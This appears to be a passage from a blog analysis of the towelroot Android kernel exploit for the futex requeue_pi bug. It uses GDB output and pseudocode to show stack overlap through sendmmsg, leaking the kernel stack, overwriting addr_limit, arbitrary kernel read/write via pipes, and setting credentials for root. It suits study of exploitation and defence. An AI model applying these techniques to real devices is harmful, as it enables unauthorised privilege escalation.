$ arm-eabi-gdb vmlinux

To connect and start debugging:

(gdb) target remote :1234

Why do I use GDB? Because this is the easiest way to get size of structure and to know what optimizations the compiler did. Lets break on the futex_wait_requeue_pi:

Breakpoint 6, futex_wait_requeue_pi (uaddr=0xb6e8be68, flags=1, val=0, abs_time=0x0, bitset=4294967295, uaddr2=0xb6e8be6c) at kernel/futex.c:2266
2266    {
(gdb) list
2261     * <0 - On error
2262     */
2263    static int futex_wait_requeue_pi(u32 __user *uaddr, unsigned int flags,
2264                                     u32 val, ktime_t *abs_time, u32 bitset,
2265                                     u32 __user *uaddr2)
2266    {
2267            struct hrtimer_sleeper timeout, *to = NULL;
2268            struct rt_mutex_waiter rt_waiter;
2269            struct rt_mutex *pi_mutex = NULL;
2270            struct futex_hash_bucket *hb;
(gdb) list
2271            union futex_key key2 = FUTEX_KEY_INIT;
2272            struct futex_q q = futex_q_init;
2273            int res, ret;

We can see the structures

(gdb) ptype timeout
type = struct hrtimer_sleeper {
    struct hrtimer timer;
    struct task_struct *task;
}

(gdb) ptype rt_waiter
type = struct rt_mutex_waiter {
    struct plist_node list_entry;
    struct plist_node pi_list_entry;
    struct task_struct *task;
    struct rt_mutex *lock;
}

We can also check the backtrace of this function

(gdb) bt
#0  futex_wait_requeue_pi (uaddr=0xb6e8be68, flags=1, val=0, abs_time=0x0, bitset=4294967295, uaddr2=0xb6e8be6c) at kernel/futex.c:2266
#1  0xc0050e54 in do_futex (uaddr=0xb6e8be68, op=, val=0, timeout=, uaddr2=0xb6e8be6c, val2=0, val3=3068706412)
    at kernel/futex.c:2668
#2  0xc005100c in sys_futex (uaddr=0xb6e8be68, op=11, val=0, utime=, uaddr2=0xb6e8be6c, val3=0) at kernel/futex.c:2707
#3  0xc000d680 in ?? ()
#4  0xc000d680 in ?? ()

We can print out the size of the structures:

(gdb) print sizeof(rt_waiter)
$1 = 48
(gdb) print sizeof(timeout)
$2 = 56
(gdb) print sizeof(to)
$3 = 4
(gdb) print sizeof(q)
$4 = 56
(gdb) print sizeof(hb)
$5 = 4

We can look at the addresses of things, in this case, the variable pi_mutex is optimized as register, so we can’t access the variable address.

(gdb) print &key2
$6 = (union futex_key *) 0xd801de04
(gdb) print &timeout
$7 = (struct hrtimer_sleeper *) 0xd801de40
(gdb) print *&to
Can't take address of "to" which isn't an lvalue.
(gdb) print &rt_waiter
$8 = (struct rt_mutex_waiter *) 0xd801de10
(gdb) print &pi_mutex
Can't take address of "pi_mutex" which isn't an lvalue.
(gdb) print &hb
$9 = (struct futex_hash_bucket **) 0xd801ddf8
(gdb) print &q
$10 = (struct futex_q *) 0xd801de78

In the linux kernel source dode, there is a very convenient script that can measure stack usage of functions, unfortunately this doesn’t work very well on ARM, but here is an example output in i386.

objdump -d vmlinux | ./scripts/checkstack.pl


...
0xc10ff286 core_sys_select [vmlinux]:			296
0xc10ff4ac core_sys_select [vmlinux]:			296
...
0xc106a236 futex_wait_requeue_pi.constprop.21 [vmlinux]:212
0xc106a380 futex_wait_requeue_pi.constprop.21 [vmlinux]:212
...
0xc14a406b sys_recvfrom [vmlinux]:			180
0xc14a4165 sys_recvfrom [vmlinux]:			180
0xc14a4438 __sys_sendmmsg [vmlinux]:			180
0xc14a4524 __sys_sendmmsg [vmlinux]:			180
...

The numbers on the right shows the maximum stack usage that was accessed by that function. The rt_waiter is not the last variable on stack, so we don’t really need to go deeper than 212. The deeper the stack, the lower address value will be used, in our case, we can ignore the hashbucket, key2, q, that totals in 64 bytes. Any syscall that has a stack use of more than 212-64 is a candidate.

Learning from geohot’s exploit, he found that there are four very convenient functions that can be used, this is the fist value in towelroot modstring, sendmmsg, recvmmsg, sendmsg, and recvmsg (each corresponds to method 0-3 in his towelroot modstring).

Knowing the address of rt_waiter, lets see the kernel stack when towelroot calls sys_sendmmsg and look at the iovstack array.

(gdb) print &iovstack[0]
$17 = (struct iovec *) 0xd801ddf0
(gdb) print &iovstack[1]
$18 = (struct iovec *) 0xd801ddf8
(gdb) print &iovstack[2]
$19 = (struct iovec *) 0xd801de00
(gdb) print &iovstack[3]
$20 = (struct iovec *) 0xd801de08
(gdb) print &iovstack[4]
$21 = (struct iovec *) 0xd801de10

Look at that, the iovstack[4] is in the same address as rt_waiter

(gdb) print iovstack
$22 = {{iov_base = 0xa0000800, iov_len = 125}, {iov_base = 0xa0000800, iov_len = 125}, {iov_base = 0xa0000800, iov_len = 125}, {
    iov_base = 0xa0000800, iov_len = 125}, {iov_base = 0xa0000800, iov_len = 1050624}, {iov_base = 0xa0000800, iov_len = 125}, {
    iov_base = 0xa0000800, iov_len = 125}, {iov_base = 0xa0000800, iov_len = 125}}

And now lets see the iov as struct rt_mutex_waiter

(gdb) print *(struct rt_mutex_waiter*)&iovstack[4]
$23 = {list_entry = {prio = -1610610688, prio_list = {next = 0x100800, prev = 0xa0000800}, node_list = {next = 0x7d, prev = 0xa0000800}},
  pi_list_entry = {prio = 125, prio_list = {next = 0xa0000800, prev = 0x7d}, node_list = {next = 0xa0000800, prev = 0xa0000800}},
  task = 0xa0000800, lock = 0xa0000800}

Of course this function can return immediately when the data is received on the other side. So what towelroot do is this: create a thread that will accept a connection in localhost, after it accept()s it, it never reads the data, so the sendmmsg call will be just hanging there waiting for the data to be sent. So the receiver thread looks like this:

bind()
listen()
while (1) {
      s = accept();
      log("i have a client like hookers");
}

As you can see in the simplest list example, that a compiler optimization can cause the address to change slightly, so the other parameter in the modstring is the hit_iov, so in the towelroot code, it looks something like this:

for (i =0 ;i < 8; i++) {
iov[i].iov_base = (void *)0xa0000800;
iov[i].iov_len = 0x7d;
if (i==TARGET_IOV) {
iov[i].iov_len = 0x100800;
}
}

The other parameter related to iov is the align. I am not completely sure about this and when this is needed. From my observation, it sets all iov_len to 0x100800.

On the other thread, basically what towelroot does is this:

void sender_thread(){
setpriority(N);
connect(to_the_listener);
futex_wait_requeue_pi(...);
sendmmsg(...) ;
}

Unfortunately, having multi core can ruin things, so to make things safe, before starting, towelroot will set the process affinity so that this process will be run on only one core.

The detail of manipulating the waiter priority list is left to the reader (the objective is to write to a memory address) , but I can give you some pointers: to add a new waiter, use FUTEX_LOCK_PI, and to control where the item will be put, call setpriority prior to waiting. The baseline value is 120 (for nice value 0), so if you set priority 12 using setpriority, you will see the priority as 132 in the kernel land. The total line of plist.h and plist.c is only around 500 lines, and you only need to go to detail for plist_add and plist_del. Depending on what we want to overwrite, we don’t even need to be able to set to a specific value.

To modify the list, you will need multiple threads with different priorities. To be sure that the threads you started is really waiting inside a syscall (there will be time from creating the thread calling the syscall until it waits inside the syscall), you can use the trick that is used by towelroot: it reads the /proc/PID/task/TID/status of the Task with TID that you want to check. When the process is inside a syscall, the voluntary_ctxt_switches will keep on increasing (and the nonvoluntary_ctxt_switches will stay, but towelroot doesn’t check this). A voluntary context switch happens when a task is waiting inside a syscall.

Usually what people do when exploiting the kernel is to write to a function pointer. We can get the location of where these pointers are stored from reading /proc/kallsysms, or by looking at System.map generated when compiling the kernel. Both is usually not (easily) available in latest Android (this is one of the security mitigations introduced in Android 4.1). You may be able to get the address by recompiling an exact same kernel image using the same compiler and kernel configuration. On most PC distributions, you can find the symbols easily (via System.map and /proc/kallsyms is not restricted.

Assume that you can somehow get the address of a function pointer to overwrite, we can write a function that sets the current process credential to have root access and redirect so that our function is called instead of the original. But there is another way to change the process credential without writing any code that runs in kernel mode, just by writing to kernel memory. You can read the full presentation here, in the next part, I will only discuss the part needed to implement the exploit.

The Kernel Stack

Every thread is assigned a kernel stack space, and part of the stack space contains thread_info for that task. The stack address is different for every thread (the size is 8KB/thread in ARM) and you can not predict the address. So there will be a bunch of 8 KB stack blocks allocated for every thread. The thread_info is stored in the stack, in the lower address (stacks begins from top/high address). This thread_info contains information such as the pointer to task_struct. Inside a syscall, the task_struct for current thread is accessible by using the current macro:

#define get_current() (current_thread_info()->task)
#define current get_current()

In ARM, current_thread_info() is defined as:

#define THREAD_SIZE             8192
static inline struct thread_info *current_thread_info(void){
register unsigned long sp asm ("sp");
return (struct thread_info *)(sp & ~(THREAD_SIZE - 1));
}

Or if you want a constant number, the thread_info is located here $sp & 0xffffe000. Here is an example of task info when I am inside a syscall:

(gdb) print  *((struct thread_info*)(((uint32_t)$sp & 0xffffe000)))
$23 = {flags = 0, preempt_count = 0, addr_limit = 3204448256, task = 0xd839d000, exec_domain = 0xc047e9ec, cpu = 0, cpu_domain = 21, cpu_context = {
    r4 = 3626094784, r5 = 3627667456, r6 = 3225947936, r7 = 3626094784, r8 = 3561353216, r9 = 3563364352, sl = 3563364352, fp = 3563372460, 
    sp = 3563372408, pc = 3224755408, extra = {0, 0}}, syscall = 0, used_cp = "\000\000\000\000\000\000\000\000\000\000\001\001\000\000\000", 
  tp_value = 3066633984, crunchstate = {mvdx = {{0, 0} }, mvax = {{0, 0, 0}, {0, 0, 0}, {0, 0, 0}, {0, 0, 0}}, dspsc = {0, 0}}, 
  fpstate = {hard = {save = {0 }}, soft = {save = {0 }}}, vfpstate = {hard = {fpregs = {334529072224223236, 0, 
        0, 0, 0, 4740737484919406592, 4562254508917369340, 4724999426224703930, 0 }, fpexc = 1073741824, fpscr = 16, 
      fpinst = 3725516880, fpinst2 = 2816}}, restart_block = {fn = 0xc0028ca8 , {futex = {uaddr = 0x0, val = 0, flags = 0, 
        bitset = 0, time = 0, uaddr2 = 0x0}, nanosleep = {clockid = 0, rmtp = 0x0, expires = 0}, poll = {ufds = 0x0, nfds = 0, has_timeout = 0, 
        tv_sec = 0, tv_nsec = 0}}}}

Before continuing, you need to get a feeling of the memory mapping. This document doesn’t help much, but it gives an idea. Since every kernel can be compiled to have a different mapping, lets assume a common mapping for 32 bit ARM kernel:

  • a very low memory address (0x0-0x1000) is restricted for mapping (for security purpose)
  • address 0x1000-0xbf000000 is the user space
  • around 0xc0000000- 0xcffffff is where the kernel code location
  • area around 0xdxxxxxxx-0xfefffffe is where the kernel data is (stack and heap)
  • high memory ranges (0xfeffffff-0xffffffff) is reserved by the kernel.

The addr_limit is a nice target for overwrite. The default value for ARM is 3204448256 (0xbf000000), this value is checked in every operation in kernel that copy values from and to user space. You can read more about this in this post (Linux kernel user to kernel space range checks). The addr_limit is per task (every thread_info can have a different limit).

Area below addr_limit is considered to be a valid memory space that user space process can pass to kernel as parameter. Just to be clear here: if we modify addr_limit, it doesn’t mean that the user space can suddenly access memory at kernel space (for example, you can’t just dereference an absolute memory like this: *(uint32_t*)0xc0000000 to access kernel space from user space). The kernel can always read all the memory, so what this limit does is to make sure that when a user space gives a parameter to a syscall, the address given must be in user space. For example, kernel will not allow write(fd, addr, len) if addr is above addr_limit.

If we can somehow increase this limit, we can then read and modify kernel structures (using read/write syscall). Using a list manipulation, we can overwrite an address, and the location of addr_limit the one we want to overwrite.

Once we overwrite the addr_limit (in arm it is located at offset 8 in thread_info after flags and preempt_count), we can then (from userspace) read the address of the task_struct field, then from there, read the address of our credential (cred) field, then write/set our uid/gid to 0, and spawn a root shell (or do anything that you like, for example: just chown root/chmod suid certain file).

Kernel stack location

So basically we have two problems here: how to find the address to overwrite, and how to overwrite it. The part about “how to overwrite” is done by the list manipulation. The part about finding the address to overwrite: use other kernel vulnerability to leak kernel memory. There are a lot of bugs in the Linux kernel where it leaks memory to userspace (here is all of them in that category, there are 26 this year, and 194 in total), not all of these bugs can be used to leak the location of the stack.

Because the thread_info is always located at the beginning of stack, we can always find it if we know any address that is located in the stack, (just use addr & 0xffffe000). So we don’t really care about the exact leaked address. In the kernel space, there are a lot of code where a stack variable points to another variable. Just for an example, here is a code in futex.c that does this:

q.rt_waiter = &rt_waiter;
q.requeue_pi_key = &key2;

Both rt_waiter and key2 are located in the stack. If there is a code in the kernel that copies data to user space from uninitialized data on stack it, then will use whatever previous values that was on that stack, this is what we call an information leak. For a specific kernel version with a specific compiler we can get a reliable address, but with different kernel version and different compiler version (and optimization), most of the time this is not very reliable (it really depends on the previous usage of the stack and the stack layout created by the compiler). We can check for the leaked value, if we see a value above the addr_limit, what we get is a possible stack location.

Towelroot uses CVE-2013-2141 which is still in most Android kernel. You can check your kernel if it is affected by looking at the patch that corresponds to that bug (just check if info is initialized like this: struct siginfo info = {}). You can experiment a little bit to get a (mostly) reliable kernel stack address leak. This is the value that is printed by towelroot (“xxxx is a good number”). Please note that this is not 100% reliable, so sometimes towelroot will try to modify invalid address (it doesn’t seem to check if the address is above bf000000). Lets say we find the (possible) memory and name this POSSIBLE_STACK from now on.

Update: I was wrong, towelroot uses the stack address from the unlinked waiter address. The waiter is unlinked because of the tgkill() call. So the address should always be valid.

Overwrite

Ideally we want to be able to read the whole kernel space, but we can start small, increase our limit a little bit. You may have noticed several things by now: the rt_waiter is stored in the stack (lets say in location X), the addr_limit is also stored in stack (lets say Y), the X location is going to be always greater than Y for that thread. We know that the thread_info is always located at sp & 0xffffe000, so we have POSSIBLE_THREAD_INFO = (POSSIBLE_STACK & 0xffffe000). So if we can put the address of any rt_waiter from other tasks and write it to (POSSIBLE_THREAD_INFO + 8), we have increased the stack limit from bf000000 to some value (usually dxxxxxxx).

I am not entirely sure (since I don’t have a samsung S5), but it seems that the addr_limit is not always in offset 8, so towelroot have limit_offset to fix the address.

How to know if we have succesfully changed the address limit for a task? From inside that task, we can use the write syscall. For example, we can try: write(fd, (void *)0xc0000000, 4) . What we are trying to do is to write the content of the memory address to a file descriptor (you can replace 0xc000000 with any address above 0xbf000000). If we can do this successfuly, then we can continue because our limit has been changed.

On my experiment, the memory leak is sometimes very predictable (it leaks always a certain task kernel address, but not always). If we know exactly which thread address we modify, we can ask that thread to continue our work, otherwise, we need to ask all the threads that we have (for example by sending a signal): can you check if the address limit have been changed for you? If a thread can read the kernel memory address, then we know the address of that thread’s thread_info, we can then read and write to POSSIBLE_THREAD_INFO + 8. First thing that we want to do is to change *(POSSIBLE_THREAD_INFO + 8) = 0xffffffff. Now this thread can read and write to anywhere.

Here is an example where a thread’s addr_limit has been successfully changed to 0xffffffff:

(gdb) print  *((struct thread_info*)(((uint32_t)$sp & 0xffffe000)))
$22 = {flags = 0, preempt_count = 0, addr_limit = 4294967295, task = 0xd45d6000, exec_domain = 0xc047e9ec, cpu = 0, cpu_domain = 21, cpu_context = {
    r4 = 3561369728, r5 = 3562889216, r6 = 3225947936, r7 = 3561369728, r8 = 3562677248, r9 = 3069088276, sl = 3561955328, fp = 3561963004, 
    sp = 3561962952, pc = 3224755408, extra = {0, 0}}, syscall = 0, used_cp = "\000\000\000\000\000\000\000\000\000\000\001\001\000\000\000", 
  tp_value = 3061055232, crunchstate = {mvdx = {{0, 0} }, mvax = {{0, 0, 0}, {0, 0, 0}, {0, 0, 0}, {0, 0, 0}}, dspsc = {0, 0}}, 
  fpstate = {hard = {save = {0 }}, soft = {save = {0 }}}, vfpstate = {hard = {fpregs = {1067681969331808106, 0, 
        0, 0, 0, 4738224773140578304, 4562254508917369340, 4732617274506747052, 0 }, fpexc = 1073741824, fpscr = 16, 
      fpinst = 3725475920, fpinst2 = 2816}}, restart_block = {fn = 0xc0028ca8 , {futex = {uaddr = 0x0, val = 0, flags = 0, 
        bitset = 0, time = 0, uaddr2 = 0x0}, nanosleep = {clockid = 0, rmtp = 0x0, expires = 0}, poll = {ufds = 0x0, nfds = 0, has_timeout = 0, 
        tv_sec = 0, tv_nsec = 0}}}}

Once you can read/write anywhere, you can do anything, its game over. First you may want to fix the plist so that it will not crash (something that was not done by towelroot v1), although sometimes in towelroot v3, it stops because it was unable to fix the list even though it can do the rooting process. Even though you can read/write using file, to make it easy you can use pipe, and write/read to/from that pipe.

If we have a pipe, with rfd as read descriptor in the side of the pipe and wfd as the write descriptor, we can do this: To read a memory from kernel: do a write(wfd, KERNEL_ADDR, size), and read the result in read(rfd, LOCAL_ADDRESS, size). To write to kernel memory: do a write(wfd, LOCAL_ADDRESS, size), and then read(rfd, KERNEL_ADDRESS, size).

If you want to play around without creating exploit, you can also try out the addr_limit by setting the value manually in your debugger.

The last modstring in towelroot is temp_root which is not related to the exploit itself, it only creates temporary root for devices that have non writeable /system.

So thats all there is to it. I have shown you where the bug is, which syscall that you can use to manipulate the stack, how to write to arbitrary address (although not in detail, but with enough pointers), what to write there, and what to do after you write there.